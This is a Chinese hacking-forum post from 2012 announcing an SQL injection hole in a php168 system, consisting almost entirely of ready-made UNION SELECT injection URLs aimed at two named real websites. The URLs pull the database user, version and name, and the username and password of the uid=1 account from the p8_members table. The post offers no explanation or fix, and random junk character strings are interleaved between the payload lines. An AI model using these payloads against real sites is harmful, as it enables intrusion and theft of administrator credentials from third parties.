找回密码
 立即注册
查看: 3583|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--& p& R7 v: [, b& v
                                                         
8 z/ X" b* N% z( g4 k& K7 U. \+ f& g                                       " `( r2 ~% Q# V5 T9 O
6 S7 V" p2 M% b# P/ t% Z
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--9 d- L  t/ ]1 b9 L
                                                     
1 f* ^! O$ _  J% Q/ U7 V                                                                  
8 j8 U6 p# m0 L3 O: G                                                        
, }/ v$ w. Z0 ^- J/ y) ~/ }http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
  ^9 V4 W- H+ M7 ?) l6 U: B- d5 I/ s. z- r# j

. w# b5 _- Q* R; H$ H6 g6 E) j; U) T$ D* Q8 U
                                                            
' m5 U" ?8 n" v7 N1 ~' f0 {% q2 d 8 Z. V7 Q/ i5 ^. O' v/ o# a8 q  d
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
' A7 p/ u8 y+ x" R. c3 q8 P6 Z9 w' h2 X. }) U
2 l5 T; m+ \& f+ n, a

$ X4 Y5 G- ~+ G, M, k% `8 k8 p( S- f                                                                    8 n  S3 }, ]0 V$ I

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表